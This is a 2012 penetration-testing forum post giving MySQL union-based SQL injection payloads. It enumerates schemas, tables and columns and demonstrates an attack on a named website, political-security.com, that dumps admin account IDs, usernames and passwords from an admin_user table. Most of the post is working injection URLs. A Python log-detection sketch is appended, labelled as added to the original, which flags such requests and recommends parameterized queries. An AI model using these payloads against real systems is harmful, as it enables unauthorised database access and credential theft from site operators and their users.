China Network Penetration Testing Alliance

Title: MySQL injection techniques

Author: admin    Time: 2012-9-13 16:29

Enumerate databases

id=-1 union select 1,..,SCHEMA_NAME,n  from/**/information_schema.SCHEMATA limit 1,1/*

Enumerate tables

id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=<hex value of the database name>/**/limit/**/1,1

Enumerate columns

id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=<hex value of the table name>/**/limit/**/1,1

MySQL 5 advanced injection method: dumping tables

An example follows:

1. Dump tables
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*    (0x79645F7465616D6E6574 is the hex encoding of the database name yd_teamnet)
Stepping through the results this way, the admin_user table appeared at the 4th one.

2. Dump columns
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*

3. Dump passwords
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
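
The requests above share a recognisable shape in web server logs: /**/ comments standing in for spaces, a union select, information_schema lookups, and hex literals in place of quoted names. The following detection sketch is an added example, not part of the original post; the function names, the /item.php and /search.php paths, and the sample request lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed request lines; /item.php and /search.php are hypothetical paths.
SAMPLE_REQUESTS = [
    "GET /item.php?id=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5"
    "/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574"
    "/**/limit/**/0,1/* HTTP/1.1",
    "GET /item.php?id=-1%20UNION%20SELECT%201,concat(0x7c,ID,0x7c,ACCOUNT,0x7c),3"
    "%20from%20admin_user%20limit%200,1 HTTP/1.1",
    "GET /item.php?id=13240 HTTP/1.1",
    "GET /search.php?q=student+union+select+committee HTTP/1.1",  # benign look-alike
]

SIGNALS = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "information_schema": re.compile(r"\binformation_schema\.(?:schemata|tables|columns)\b"),
    "hex_literal": re.compile(r"\b0x(?:[0-9a-f]{2})+\b"),
}

def normalize(query: str) -> str:
    """URL-decode, turn SQL comments into spaces, collapse whitespace, lowercase."""
    text = unquote_plus(query)
    text = re.sub(r"/\*.*?\*/", " ", text)  # closed comments used as whitespace
    text = re.sub(r"/\*.*$", " ", text)     # trailing unterminated comment
    return re.sub(r"\s+", " ", text).strip().lower()

def decode_hex_literals(text: str) -> list[str]:
    """Decode printable-ASCII hex literals so the analyst sees the targeted names."""
    out = []
    for m in re.finditer(r"\b0x((?:[0-9a-f]{2})+)\b", text):
        raw = bytes.fromhex(m.group(1))
        if all(32 <= b < 127 for b in raw):
            out.append(raw.decode("ascii"))
    return out

def inspect_request(request_line: str) -> dict:
    """Flag a request only when union select appears together with another signal."""
    target = request_line.split(" ")[1]
    text = normalize(target.partition("?")[2])
    hits = sorted(name for name, rx in SIGNALS.items() if rx.search(text))
    return {
        "suspicious": "union_select" in hits and len(hits) >= 2,
        "signals": hits,
        "decoded_names": decode_hex_literals(text),
    }
```

Detection of this kind supports triage only; the fix for the underlying flaw is a parameterized query for the numeric id parameter.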